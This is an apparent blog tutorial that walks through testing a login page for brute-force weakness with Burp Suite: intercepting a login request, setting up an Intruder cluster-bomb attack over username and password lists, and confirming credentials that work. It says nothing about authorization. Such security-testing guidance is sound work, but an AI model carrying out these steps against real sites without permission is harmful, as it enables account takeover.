How to check the Brute Force Vulnerability on a Login Page for a web-application
3 min readOct 13, 2022
Steps to download and install the burp suite:
- Download the burp suite.
Link: https://portswigger.net/burp/communitydownload
- Finish the installation of the downloaded burp suite in your system.
Steps for configuring the burp suite with the web-browser
- Configure your Burpsuite to work with an external browser.
Link: https://portswigger.net/burp/documentation/desktop/external-browser-config
Steps to brute force a login page:
- Open the target “URL” in the web browser.
- Turn on the Proxy “Intercept” tab in the burp suite.
- In the open browser enter some arbitrary details into the login page and submit the request.
- Eg: User name as a “test” & Password as a “test”.
- The captured request can be viewed in the Proxy “Intercept” tab.
- Right-click on the request to bring up the context menu.
- Then click “Send to Intruder”.
- Go to the Intruder “Positions” tab.
- Clear the pre-set payload positions by using the “Clear” button on the right of the request editor.
- Add the “username” and “password” parameter values as positions by highlighting them and using the “Add” button.
- Change the attack to “Cluster bomb” using the “Attack type” drop-down menu.
- Go to the “Payloads” tab.
- In the “Payload sets” settings, ensure “Payload set” is “1” and “Payload type” is set to “Simple list”.
- In the “Payload options” settings enter some possible usernames.
- You can do this manually or use a custom or pre-set payload list.
- Next, in the “Payload Sets” options, change the “Payload” set to “2”.
- In the “Payload options” settings enter some possible passwords.
- You can do this manually or using a custom or pre-set list.
- Click the “Start attack” button.
- In the “Intruder attack” window you can sort the results using the column headers.
Eg: Sort by “Length” and by “Status”.
- To confirm that the brute force attack has been successful, use the gathered information (username and password) on the web application’s login page.
You’re done.
Happy Hacking!